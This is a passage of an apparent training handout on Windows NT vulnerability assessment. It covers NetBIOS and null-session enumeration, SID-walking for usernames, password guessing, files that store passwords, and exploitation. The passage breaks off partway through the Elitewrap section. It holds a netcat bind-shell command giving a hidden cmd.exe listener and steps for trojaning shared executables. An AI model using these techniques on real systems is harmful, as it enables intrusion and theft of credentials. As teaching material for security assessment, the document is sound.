You are on page 1of 63

Windows NT Assessment Techniques

Johnny Long
Johnny@ihackstuff.com

1
Contents

Introduction ............................................................................................................................................ 3
Windows NT Basics............................................................................................................................... 3
Terminology........................................................................................................................................ 3
Scoping the target.................................................................................................................................. 4
NBTSTAT: The First Step ................................................................................................................. 4
IP-to NETBIOS Name mapping ........................................................................................................ 7
IPC shares.......................................................................................................................................... 9
NULL IPC shares ......................................................................................................................... 10
IPC Upgrading .............................................................................................................................. 10
Information Gathering.......................................................................................................................... 11
NET VIEW command ...................................................................................................................... 11
Mounting Shares .............................................................................................................................. 12
Share “Crawling” .............................................................................................................................. 13
NetDom Utility .................................................................................................................................. 14
NETDOM QUERY........................................................................................................................ 15
NETDOM BDC ............................................................................................................................. 16
NETDOM Member ....................................................................................................................... 17
NETDOM Master.......................................................................................................................... 18
NETDOM Resource ..................................................................................................................... 19
USER2SID........................................................................................................................................ 20
SID2USER........................................................................................................................................ 21
Getting Userlists .................................................................................................................................. 22
SID reversal .................................................................................................................................. 22
EnumUsers (QTIP)....................................................................................................................... 23
EnumUsers: (net users)............................................................................................................... 23
Splinter .......................................................................................................................................... 24
Ntinfo ............................................................................................................................................. 26
NTSplitter ...................................................................................................................................... 27
Username/Password Guessing .......................................................................................................... 28
IPC connections ........................................................................................................................... 28
Netbios Auditing Tool (NAT)........................................................................................................ 29
Exploitation Techniques ...................................................................................................................... 30
Netcat................................................................................................................................................ 30
Trojan Planting: Elitewrap ............................................................................................................... 31
Remote Attacks................................................................................................................................ 34
Remote registry updates ............................................................................................................. 34
Password Sniffing ........................................................................................................................ 36
Password Cracking – L0phtcrack ............................................................................................... 37
Local Advancement Attacks............................................................................................................ 39
GETADMIN................................................................................................................................... 39
“SECHOLE” .................................................................................................................................. 40
Application Attacks .............................................................................................................................. 41
Microsoft Internet Information Server 3.0....................................................................................... 41
Information Gathering (IG)........................................................................................................... 41
IIS 3.0 WWW Server Default Files and Directories: .................................................................. 43
IIS 3.0 WWW Default Service Properties ................................................................................... 46
IIS 3.0 FTP Default Service Properties....................................................................................... 47
IIS 3.0 Gopher Default Service Properties ................................................................................. 48
Microsoft Internet Information Server 4.0....................................................................................... 49
IIS Remote Overflow .................................................................................................................... 49
IIS 4.0 WWW Server Default Files and Directories: .................................................................. 49
IIS 3.0 WWW Server Hidden Files and Directories: .................................................................. 60
ColdFusion ....................................................................................................................................... 62

2
Introduction
Windows NT Vulnerability Assessments are very similar to UNIX-targeted assessments as far as
methodology. It is for that reason that Vulnerability Assessment methodology will not be covered
in this lesson. Several technology differences set Windows NT apart from UNIX. These
technology differences will serve as the subject for this paper.

After finishing this lesson, students should be able to:

• Remotely identify Windows NT machines


• Gather information from Windows NT machines
• Determine Usernames and Policies on Windows NT machines
• Launch Brute-force attacks against Windows NT machines
• Advance privileges on standard Windows NT users

Windows NT Basics

Terminology

SID – security ID:

A unique name that identifies a logged-on user to the security system. Security IDs (SIDs) can
identify one user, or a group of users.

SAM – Security Accounts Manager:

A database of security information such as user account names and passwords, and the security
policy settings. For Windows NT Workstation, the directory database is managed using User
Manager. For a Windows NT Server domain, it is managed using User Manager for Domains. (

Server:

A stand-alone Windows NT machine which contains its own Authentication information.

Domain:

A model of NT networking which centralizes all Authentication information and functionality into a
single machine or group of machines

3
Scoping the target

NBTSTAT: The First Step

NBTSTAT Shows Services running, Names and Domain Configuration info

Displays protocol statistics and current TCP/IP connections using NBT


(NetBIOS over TCP/IP).

NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n]


[-r] [-R] [-s] [-S] [interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists the remote name cache including the IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to host names via the hosts file.

RemoteName Remote host machine name.


IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.

From the Rhino9 “wardoc”:

The column headings generated by NBTSTAT have the following meanings:

Input
Number of bytes received.
Output
Number of bytes sent.
In/Out
Whether the connection is from the computer (outbound) or from another
system to
the local computer (inbound).
Life
The remaining time that a name table cache entry will "live" before your
computer
purges it.
Local Name
The local NetBIOS name given to the connection.
Remote Host
The name or IP address of the remote host.
Type
A name can have one of two types: unique or group.
The last byte of the 16 character NetBIOS name often means something
because the same name can be present multiple times on the same computer.
This shows the last byte of the name converted into hex.

4
State
Your NetBIOS connections will be shown in one of the following "states":

State Meaning

Accepting An incoming connection is in process.

Associated The endpoint for a connection has been created and your
computer has associated it with an IP address.

Connected This is a good state! It means you're connected to the remote


resource.

Connecting Your session is trying to resolve the name-to-IP address


mapping of the destination resource.

Disconnected Your computer requested a disconnect, and it is waiting for


the remote computer to do so.

Disconnecting Your connection is ending.

Idle The remote computer has been opened in the current session,
but is currently not accepting connections.

Inbound An inbound session is trying to connect.

Listening The remote computer is available.

Outbound Your session is creating the TCP connection.

Reconnecting If your connection failed on the first attempt, it will


display this state as it tries to reconnect.

5
Name Number Type Usage
=========================================================================
<computername> 00 U Workstation Service
<computername> 01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
<computername> 03 U Messenger Service
<computername> 06 U RAS Server Service
<computername> 1F U NetDDE Service
<computername> 20 U File Server Service
<computername> 21 U RAS Client Service
<computername> 22 U Exchange Interchange
<computername> 23 U Exchange Store
<computername> 24 U Exchange Directory
<computername> 30 U Modem Sharing Server Service
<computername> 31 U Modem Sharing Client Service
<computername> 43 U SMS Client Remote Control
<computername> 44 U SMS Admin Remote Control Tool
<computername> 45 U SMS Client Remote Chat
<computername> 46 U SMS Client Remote Transfer
<computername> 4C U DEC Pathworks TCPIP Service
<computername> 52 U DEC Pathworks TCPIP Service
<computername> 87 U Exchange MTA
<computername> 6A U Exchange IMC
<computername> BE U Network Monitor Agent
<computername> BF U Network Monitor Apps
<username> 03 U Messenger Service
<domain> 00 G Domain Name
<domain> 1B U Domain Master Browser
<domain> 1C G Domain Controllers
<domain> 1D U Master Browser
<domain> 1E G Browser Service Elections
<INet~Services> 1C G Internet Information Server
<IS~Computer_name> 00 U Internet Information Server
<computername> [2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service

6
IP-to NETBIOS Name mapping

In order for Windows NT to understand the correlation between IP addresses and NETBIOS
machine names, a WINS server must be consulted. If a WINS server has not been located, the
mappings can be performed manually using the file
%WINNT%\system32\drivers\etc\lmhosts.

By default, a sample of this file is included on NT installations as


%WINNT%\system32\drivers\etc\lmhosts.sam

This file should look like this:

# Copyright (c) 1993-1995 Microsoft Corp.


#
# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows
# NT.
#
# This file contains the mappings of IP addresses to NT computernames
# (NetBIOS) names. Each entry should be kept on an individual line.
# The IP address should be placed in the first column followed by the
# corresponding computername. The address and the comptername
# should be separated by at least one space or tab. The "#" character
# is generally used to denote the start of a comment (see the exceptions
# below).
#
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:<domain>
# #INCLUDE <filename>
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:<domain>" tag will associate the
# entry with the domain specified by <domain>. This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The <domain> is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE <filename>" will force the RFC NetBIOS (NBT)
# software to seek the specified <filename> and parse it as if it were
# local. <filename> is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
#
\machine\system\currentcontrolset\services\lanmanserver\parameters\nullsession
shares
# in the registry. Simply add "public" to the list found there.
#

7
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
#
# The following example illustrates all of these extensions:
#
# 102.54.94.97 rhino #PRE #DOM:networking #net group's DC
# 102.54.94.102 "appname \0x14" #special app server
# 102.54.94.123 popular #PRE #source server
# 102.54.94.117 localsrv #PRE #needed for the include
#
# #BEGIN_ALTERNATE
# #INCLUDE \\localsrv\public\lmhosts
# #INCLUDE \\rhino\public\lmhosts
# #END_ALTERNATE
#
# In the above example, the "appname" server contains a special
# character in its name, the "popular" and "localsrv" server names are
# preloaded, and the "rhino" server name is specified so it can be used
# to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
# system is unavailable.
#
# Note that the whole file is parsed including comments on each lookup,
# so keeping the number of comments to a minimum will improve performance.
# Therefore it is not advisable to simply add lmhosts file entries onto the
# end of this file.

This file works much like an /etc/hosts file under UNIX. Create a copy of this file, and save it as
“%WINNT%\system32\drivers\etc\lmhosts”

Make sure that the file is not saved as


“%WINNT%\system32\drivers\etc\lmhosts.txt

The .txt extension should not be present!

Populate this file with IP addresses and NETBIOS names as follows:


10.10.10.1 BOX1 #PRE #DOM
10.10.10.2 BOX2 #PRE #DOM:DOMAIN1

The NETBIOS names can be retrieved from your nbtstat listings.

In the example above, 10.10.10.1 will be known as “BOX1”, while 10.10.10.2 will be known as
“BOX2”. In addition, “BOX2” is known to be a member of the “DOMAIN1”

In order for NT to read this file, issue the following command:

nbtstat -R

To list your IP-to-NETBIOS mappings, issue the command:

nbtstat –c

Be sure to enable LMHOSTS lookup under NETWORK|PROTOCOLS|TCP/IP|WINS.

8
IPC shares

IPC, or Inter-process Communication is a default share on all Windows


NT machines. This share is generally used for server-to-server
communications. Whenever a new connection is made to a server, an IPC$
connection is established automatically, transparent to the user. To
connect to the IPC$ share, the NET USE command can be employed:

The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]


[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

NET USE connects a computer to a shared resource or disconnects a


computer from a shared resource. When used without options, it lists
the computer's connections.

devicename Assigns a name to connect to the resource or specifies


the device to be disconnected. There are two kinds of
devicenames: disk drives (D: through Z:) and printers
(LPT1: through LPT3:). Type an asterisk instead of a
specific devicename to assign the next available
devicename.
\\computername Is the name of the computer controlling the shared
resource. If the computername contains blank characters,
enclose the double backslash (\\) and the computername
in quotation marks (" "). The computername may be from
1 to 15 characters long.
\sharename Is the network name of the shared resource.
\volume Specifies a NetWare volume on the server. You must have
Client Services for Netware (Windows NT Workstations)
or Gateway Service for Netware (Windows NT Server)
installed and running to connect to NetWare servers.
password Is the password needed to access the shared resource.
* Produces a prompt for the password. The password is
not displayed when you type it at the password prompt.
/USER Specifies a different username with which the connection
is made.
domainname Specifies another domain. If domain is omitted,
the current logged on domain is used.
username Specifies the username with which to logon.
/HOME Connects a user to their home directory.
/DELETE Cancels a network connection and removes the connection
from the list of persistent connections.
/PERSISTENT Controls the use of persistent network connections.
The default is the setting used last.
YES Saves connections as they are made, and restores
them at next logon.
NO Does not save the connection being made or subsequent
connections; existing connections will be restored at
next logon. Use the /DELETE switch to remove
persistent connections.
NET HELP command | MORE displays Help one screen at a time.

9
NULL IPC shares

By default, NT servers allow a “NULL” IPC connection. This enables foreign servers to determine
certain types of information without a username or password on the server. A NULL IPC$
connection is very similar to a standard IPC$ connection which is made similar to the following:

NET USE \\IP_ADDR\IPC$ “password” /USER: “joeuser”

In the above example, the user “joeuser” is connecting to \\IP_ADDR with a password of
“password”.

To perform a “NULL” IPC$ connection, use the following syntax:

NET USE \\IP_ADDR\IPC$ “” /USER: “”

This will connect to the IPC$ on \\IP_ADDR as the user “” (NULL) with a password of “” (NULL)!

It is possible to disallow these anonymous connections, in which case this command will fail.

IPC Upgrading

Later, once a username and password combination has been obtained, this IPC$ connection can
be “upgraded” to the credentials of that user. Upgrading your IPC connection will effectively give
you the same permissions as that user whenever you access that server.

To upgrade an IPC connection, first delete the existing connection:

NET USE \\IP_ADDR\IPC$ /delete

Then, connect back to the server with your new credentials:

NET USE \\IP_ADDR\IPC$ “badpassword” /USER: “joeuser”

10
Information Gathering

NET VIEW command

Once a connection is made to the remote machine, attempt to perform a net view command on
the target.

The syntax of this command is:

NET VIEW [\\computername | /DOMAIN[:domainname]]


NET VIEW /NETWORK:NW [\\computername]

NET VIEW displays a list of resources being shared on a computer. When used
without options, it displays a list of computers in the current domain or
network.

\\computername Is a computer whose shared resources you want


to view.
/DOMAIN:domainname Specifies the domain for which you want to
view the available computers. If domainname is
omitted, displays all domains in the local area
network.
/NETWORK:NW Displays all available servers on a NetWare
network. If a computername is specified, the
resources available on that computer in
the NetWare network will be displayed.

Example:

E:\RESKIT>net view \\172.16.101.200


Shared resources at \\172.16.101.200

Share name Type Used as Comment

-------------------------------------------------------------------------------
Clients Disk
i386 Disk
NETLOGON Disk Logon server share
The command completed successfully.

This will show share information about the server. This information may not have been available
without the NULL IPC$ connection.

11
Mounting Shares

Now armed with a list of shares on the remote servers, we can attempt to mount these shares on
our local machine using the “net use” command.

Example:

C:\> net use \\IP_ADDRESS\IPC$ “” /user:””


The command completed successfully.

C:\> net use X: \\IP_ADDRESS\SHARE

This will attempt to connect your X: drive to the \\IP_ADDRESS\SHARE share with a null
password and a null username. If successful, the following message is displayed:

The command completed successfully.

In addition, your local X: drive will now be connected to the \\IP_ADDRESS\SHARE share.

Later in the assessment, once you have determined a proper username/password combination,
upgrade your IPC connection and try the share mount again. NAT (discussed later) will also tell
you if that user has permission to mount that share.

Note on Windows NT shares: Windows NT does not allow “anonymous share access.” In other
words, a valid username and password must be used to access shares on Windows NT Servers.
When trying to connect across a Null IPC$ connection, a Windows NT share will prompt you for a
password. This prompt is requesting the password for the account you are logged in as. In other
words, if you are logged into your machine as administrator, you need to type the password for
administrator on the target box to gain access to the share.

12
Share “Crawling”

From the Rhino9 “Wardoc”:

Many files contain sensitive information:

• Eudora.ini: Eudpass.com extracts email passwords

• Tree.dat: Used by cuteFTP to store passwords. Use FireFTP to crack passwords.

• .PWL files store Windows client passwords. Use glide.exe to extract passwords

• .PWD files store FrontPage/Personal Webserver plaintext usernames and passwords

• WS_FTP.ini used by ws_ftp to store passwords. The encryption is weak.

• .IDC files contain username/password information about webservers accessing databases.

• Waruser.dat is used by WarFTP. Beta version 1.70 contains the Root FTP password.

• $winnt$.inf is the data file used for Unattended Windows NT installations. A username and
password may be contained in this file.

• SAM._ is a copy of the SAM database. Passwords can be dumped with SAMDUMP and
cracked offline.

• ExchVerify.log is created by Cheyenne/Innoculan/ArcServe and contains username and


password information.

13
NetDom Utility

The netdom command can be used to gather NT network information. There


are several major options available to the program, and they are
detailed below.

NetDom 1.7 @1997. Written by Christophe Robert (chrisrob@microsoft.com).

The syntax of this command is:

NETDOM [/Options] command


- or -
NETDOM HELP command

Commands available are:

NETDOM BDC NETDOM HELP NETDOM MASTER


NETDOM MEMBER NETDOM QUERY NETDOM RESOURCE

Options are as follows:

Options Description
-----------------------------------------------------------------------
/D[OMAIN]:DOMAINNAME Performs the operation on the primary domain
controller of the domain DOMAINNAME.
If this option is not used then the domain
is the one of which the workstation or the
server is a server. If the computer is a
domain controller, the operation takes place
on the current domain.

/U[SER]:DOMAIN\USER User account used to make the connection with


the primary domain controller on which the
action is to be performed.
If this option is not used, the current user
account is used.

/P[ASSWORD]:password Password of the user account defined along with


the option /USER.

/NOVERBOSE Not verbose. Displays only the results of the


performed operation.

14
NETDOM QUERY
Queries computers domain information and checks secure channels.
It can be run for any domain member or BDC.

Example:

E:\RESKIT>netdom query \\swallow


NetDom 1.7 @1997. Written by Christophe Robert (chrisrob@microsoft.com).

Querying domain information on computer \\SWALLOW ...


Computer \\SWALLOW is a domain controller of AERIE.
Searching PDC for domain AERIE ...
Found PDC \\SWALLOW
Connecting to \\SWALLOW ...
Computer \\SWALLOW is the PDC of AERIE.

In this example, a null IPC connection was made to \\SWALLOW, and an lmhosts entry exists
that lists:

172.16.101.200 SWALLOW #PRE #DOM:AERIE

This way, your attack machine knows the IP address and the domain association of \\SWALLOW.

15
NETDOM BDC
Commands are as follows:

Command Description
-----------------------------------------------------------------------
No command Lists the BDCs of the domain. Must be used
without any BDC name.

/ADD Adds a computer account for the BDC.

/DELETE Removes the computer account for the BDC.

/QUERY Queries domain information of the BDC and


checks the secure channel.

/RESET Resets secure channel of the BDC.

Example:

E:\RESKIT>netdom /d:aerie bdc


NetDom 1.7 @1997. Written by Christophe Robert
(chrisrob@microsoft.com).

Searching PDC for domain AERIE ...


Found PDC \\SWALLOW
Connecting to \\SWALLOW ...
Listing BDCs of AERIE ...

BDC 1 = \\MAGPIE

In this example, a null IPC connection was made to \\SWALLOW, and an lmhosts entry exists
that lists:

172.16.101.201 SWALLOW #PRE #DOM:AERIE

This way, your attack machine knows the IP address and the domain association of \\SWALLOW.

16
NETDOM Member
Commands are as follows:

Command Description
-----------------------------------------------------------------------
No command Lists the members of the domain. Must be used
without any member name.

/JOINDOMAIN Joins a domain. Resets the secure channel if the


member was already in the domain.

/JOINWORKGROUP WORKGROUP Joins a workgroup.

/ADD Adds a computer account for the member.

/DELETE Removes the computer account for the member.

/QUERY Queries domain information of the member.

Example:

E:\RESKIT>netdom /d:aerie member


NetDom 1.7 @1997. Written by Christophe Robert
(chrisrob@microsoft.com).

Searching PDC for domain AERIE ...


Found PDC \\SWALLOW
Connecting to \\SWALLOW ...
Listing members of domain AERIE ...

Member 1 = \\DUCK
Member 2 = \\NT2
Member 3 = \\NT4
Member 4 = \\NT5
Member 5 = \\NT6
Member 6 = \\NT7
Member 7 = \\NTKWS001
Member 8 = \\PELICAN
Member 9 = \\PENGUIN
Member 10 = \\QUAIL

In this example, a null IPC connection was made to \\SWALLOW, and an lmhosts entry exists
that lists:

172.16.101.202 SWALLOW #PRE #DOM:AERIE

This way, your attack machine knows the IP address and the domain association of \\SWALLOW.

17
NETDOM Master
Commands are as follows:

Command Description
-----------------------------------------------------------------------
No command Lists the resource domains of the master domain.
Must be used without any master domain name.

/TRUST Establish a trust relationship between the


resource domain and the master domain.
The resource domain is the current domain or the
domain specified along with the option /DOMAIN.
Resets the secure channel if the trust
relationship was previously existing.

A password can be specified in the command line.


If no password is defined then a default password
is used (eg, the resource domain name in lower
case and limited to 14 characters).

/DELETE Removes the Master Domain.

/QUERY Queries the master domain information on the


resource domain PDC and checks the secure
channel.

18
NETDOM Resource
Commands are as follows:

Command Description
-----------------------------------------------------------------------
No command Lists the resource domains of the master domain.
Must be used without any domain resource name.

/ADD Adds an account for the resource domain.

A password can be specified in the command line.


If no password is defined then a default password
is used (eg, the resource domain name in lower
case and limited to 14 characters).

/DELETE Removes the account for the resource domain.

/QUERY Queries the resource domain account. Checks the


secure channel between the resource domain and
the master domain.

Example:

E:\RESKIT>netdom /d:aerie resource


NetDom 1.7 @1997. Written by Christophe Robert
(chrisrob@microsoft.com).

Searching PDC for domain AERIE ...


Found PDC \\SWALLOW
Connecting to \\SWALLOW ...
Listing resource domains of AERIE ...

Resource Domain 1 = FLOCKER

In this example, a null IPC connection was made to \\SWALLOW, and an lmhosts entry exists
that lists:

172.16.101.203 SWALLOW #PRE #DOM:AERIE

This way, your attack machine knows the IP address and the domain association of \\SWALLOW.

19
USER2SID

User2sid is a program that converts usernames into SIDs (Security Identifiers). This program can
be used over a null IPC$ connection.

The usage of this program is as follows:

Evgenii Rudnyi (C) All rights reserved, 1998


Chemistry Department, Moscow State University
119899 Moscow, Russia, http://www.chem.msu.su/~rudnyi/welcome.html
rudnyi@comp.chem.msu.su
This utility is freeware and in public domain. Feel free to use and
distribute it. Optionally, provided you like the utility,
you may send me a bottle of beer.

Disclaimer of warranty:
This utility is supplied as is. I disclaim all warranties,
express or implied, including, without limitation, the warranties of
merchantability and of fitness of this utility for any purpose. I assume
no liability for damages direct or consequential, which may result from
the use of this utility.

The goal of the utility is to obtain SID from the account name, usage:
user2sid [\\computer_name] account_name
where computer_name is optional. By default, the search
starts at a local Windows NT computer.

For example:

C:\>user2sid \\172.16.101.200 guest

S-1-5-21-1577673719-892752668-604069369-501

Number of subauthorities is 5
Domain is AERIE
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

This will show you the SID of the Guest user. If a guest user does not exist on the server, try
other accounts, like Administrator or IUSR_MACHINENAME.

20
SID2USER

Sid2user is a program which converts a SID into a username.

Evgenii Rudnyi (C) All rights reserved, 1998


Chemistry Department, Moscow State University
119899 Moscow, Russia, http://www.chem.msu.su/~rudnyi/welcome.html
rudnyi@comp.chem.msu.su
This utility is freeware and in public domain. Feel free to use and
distribute it. Optionally, provided you like the utility,
you may send me a bottle of beer.

Disclaimer of warranty:
This utility is supplied as is. I disclaim all warranties,
express or implied, including, without limitation, the warranties of
merchantability and of fitness of this utility for any purpose. I assume
no liability for damages direct or consequential, which may result from
the use of this utility.

The goal of the utility is to obtain the account name from SID, usage:
sid2user [\\computer_name] authority subauthority_1 ...
where computer_name is optional. For example,
sid2user 5 32 544
By default, the search starts at a local Windows NT computer.

For Example:

C:\>sid2user \\172.16.101.200 5 21 1577673719 892752668 604069369 501

Name is Guest
Domain is AERIE
Type of SID is SidTypeUser

This will show you the Username associated with this SID. For this example, we used the SID we
received from the previous example. Note that we started with the “5” in the SID, and converted
dashes (-) with spaces.

21
Getting Userlists

SID reversal

SIDs are a unique number associated with objects in Windows NT. User SIDs are generated
sequentially. When an NT server is first installed, the last digits of User SIDs begin at 500.
After the system is installed, server administrators generally add more users to the system. These
users last SID digits begin with 1000.

For example:

A freshly installed server may have the following users:

User Name Last SID digits


Administrator 500
Guest 501

Once the server is installed, an administrator adds more users in the following order:

User Name Last SID digits


User1 1000
User2 1001
User3 1002
BackupOperator 1003

Notice that the last field of the SID increments by 1 each time a new user is added. Also notice
that these numbers start at 500 during the install, and start at 1000 after the install.

Using this knowledge, we can use the sid2user and user2sid tools to perform more information
gathering, specifically determining usernames on the server.

1. Connect to the target machine with a null IPC$ connection


2. Run user2sid against the target machine with a common username such as guest or
administrator:

C:\>user2sid \\IP_ADDRESS Administrator

(S-1-5-21-1577673719-892752668-604069369-500 is returned)

3. Using the SID returned above, feed this SID into sid2user. Begin with the 5, and replace
dashes with spaces:

C:\>sid2user \\172.16.101.200 5 21 1577673719 892752668 604069369 501

If you typed in the SID correctly, the “Name is Guest” response should be
shown.

This confirms that you typed in the SID correctly.

4. Now, continue running sid2user, incrementing the last field of the SID by
one until you receive a “LookupSidName failed - no such account” error message.
This indicates the end of the userlist for that range. Sweep through SIDs
starting at 500, then start sweeping through SIDs starting at 1000. Record all
usernames you get back. This is a list of users on the Server.

22
EnumUsers (QTIP)

Using another technique, usernames can be retrieved across the IPC$ share using the
ENUMUSERS API call. The tool “qtip” uses this technique.

To use qtip, simply run the utility with the name of the target machine:

C:\>qtip \\SWALLOW

(a vulnerable server will list all usernames)

EnumUsers: (net users)

The EnumUsers API call can also be leveraged by the “net users” command, assuming you are:

1. Running on Windows NT Workstation


2. Currently a member of the Domain you are attacking

If these factors are both true, the

Net users /domain

Command will return a list of users in the domain.

23
Splinter

Splinter automates the process of SID reversal. A kludge of a program written by Johnny, this
takes some of the pain out of SID reversing.

Supply the target hostname…

24
SIDS are reversed automatically from 500-599 and 1000-1099. More SIDs can be coded into the
userlist.pl program…

A list of users on the target box is returned. A file is also created in the format IP_ADDRESS.out
which contains the same list.

25
Ntinfo
The Hydra support tool “ntinfo” creates a NULL (default) IPC connection and makes remote RPC
calls against a target NT box. These RPC calls query the user, group and auditing information on
the target box.

Using this information, the following settings can be determined:

Complete User list


Complete Group list
Complete User auditing information
Account lockout
Date last used
Date created
Number of bad logins
Number of logins

26
NTSplitter

The Hydra support tool ntsplitter performs the tasks of both SID reversal as well as the
enumusers technique. In addition, ntsplitter creates output files that are compatible with the Hydra
support tool “deflogin.“ Deflogins performs password guessing when supplied with a list of
usernames. By default, deflogin attempts passwords of username, null and “password” against a
user account.

For example, if the username “Administrator” is supplied to deflogin without password options, the
following passwords will be attempted:

administrator
<NULL>
password

All attempts are LANMAN authentication attempts, thus making all password attempts case-
insensitive.

In addition, ntsplitter pulls the gecos (user information field) for each user, and will try each word
in the user information field as long as there are enough available bad password tries.

Ntsplitter pulls the bad password attempts information about each user. This keeps ntsplitter from
locking out accounts on the target.

Important note: The deflogin program is not aware of account lockout information. Ntsplitter is.
This means that you can lock out an account by running deflogins more than once with the same
ntsplitter output file.

27
Username/Password Guessing

IPC connections

Using IPC$ connections along with your obtained userlists, it is now possible to attempt
username and password combinations against the target machine.

For example:

C:\> Net use \\IP_ADDRESS\IPC$ “foo” /user:”joe”


System error 1326 has occurred.

Logon failure: unknown user name or bad password.


This indicates that the username or password was wrong.

C:\> Net use \\IP_ADDRESS\IPC$ “goodpassword” /user:”joe”


The command completed successfully.

This indicates that the username and password were correct!!

Use this technique to test username and password combinations on the target server. Remember
that old IPC$ connections should be deleted before trying a new one.

28
Netbios Auditing Tool (NAT)

A more efficient technique involves the use of the Netbios Auditing Tool (NAT). Nat has many
functions, including:

• Displaying browse listings


• Displaying workstation information
• Displaying user information
• Displaying name tables
• Attempting username/password combinations against a target

In addition, if NAT successfully guesses a username/password combo, it will display information


about what privileges that account has.

The usage of NAT is as follows:

[*] NAT - NetBIOS Auditing Tool v2.0


Copyright 1996, 1997, 1998, Secure Networks Inc.

usage: nat [options] <address>


-u <file> Specify userlist textfile (default 'userlist.txt')
-p <file> Specify password textfile (default 'passlist.txt')
-g Guess only username as password, do not use passlist
-n Only dump remote name tables
-b Do not dump browse listing
-w Do not dump workstation information
-i Do not dump user information
-s Do not perform share security checks
-l <num> Specify the number of parallel password (default 20)
grinding processes to use when guessing passwords
-o <file> Specify a filename to write all output to

Note: When using a password list and a userlist, keep in mind that every password in the
password list is attempted against every username in the userlist. Bear in mind that when NAT
finds a password, it will not continue with y other users in your list. You will need to delete all of
the users up to and including the user that the user with the vulnerable password.

It is generally easier to use the –g option first, to find accounts with the username the same as
the password. Once that is finished, follow with a –u –p run.

Example:

Att~# nat –u userlist.txt –p passlist.txt 172.16.101.200

Fill in the userlist.txt file with the usernames gathered in the previous section.
A sample passlist.txt may contain:
password

This will attempt the word password on every user in the list.

29
Exploitation Techniques

Netcat

Now that you have access to username/password combinations, and access to a share, it would
help to have access to a command prompt. Since a telnet server is not installed with NT, we can
use an alternative, such as netcat, written by *hobbit*.

Netcat usage:

[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]


-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

A very easy way to setup a basic telnet server is with this command line:

C:\> nc –t –d –e cmd.exe –l –p 99

This will run a telnet server listening on port 99, running cmd.exe once connected, detached from
the console (stealthy).

Try running this server. What happens after you disconnect?

Try running with the –L option instead of –l. What does this do differently?

30
Trojan Planting: Elitewrap

Trojan horse programs are a common way of leveraging a greater level of access to a system. In
a nutshell, a program is executed which runs other commands in addition to its own. When a user
executes the trojanned program, all commands are executed as that user.

One common use of a trojan in NT involves to following scenario:

1. You gain write access to a share which contains commands.

2. Trojan one of the commands to run netcat listening on a port

3. The user runs the command, launching a “telnet-like” listener

4. Now, as an attacker, you can telnet into the NT server, and run commands, or move about
the system as that user.

A common program used to create custom trojans is called “Elitewrap”.

Elitewrap Usage:


(C) Tom "eLiTe" McIntyre, 1999
tom@dundeecake.demon.co.uk
http://www.dundeecake.demon.co.uk/elitewrap

Usage
=====
The eLiTeWrap archiver ("elitewrap.exe") is a command-line utility, used as
follows:

elitewrap.exe [scriptfile]

Running elitewrap.exe with no parameters will start the program ready to


receive input from the user. The on-screen prompts are descriptive enough that
little explanation should be necessary. However, I will run through them:

Prompt Response
------ --------
Enter name of output file: ] This is the packfile you want to create.
] Remember to specify a .exe extension, for
] example: "install.exe".

[If the file already exists you will be asked whether or not to overwrite it]

[Now each of the operations will be displayed, just for your reference, as
follows:]
Operations: 1 - Pack only
2 - Pack and execute, visible, asynchronously
3 - Pack and execute, hidden, asynchronously
4 - Pack and execute, visible, synchronously
5 - Pack and execute, hidden, synchronously
6 - Execute only, visible, asynchronously
7 - Execute only, hidden, asynchronously
8 - Execute only, visible, synchronously
9 - Execute only, hidden, synchronously

Enter package file #1: ] This is the name of the first file you

31
] want to pack, or execute. For example, to
] specify "go.exe" in the current directory
] you would just type "go.exe". To specify
] a file elsewhere on your system, specify
] a full path, for example:
] "c:\windows\calc.exe".

Enter operation: ] This is where you specify an operation,


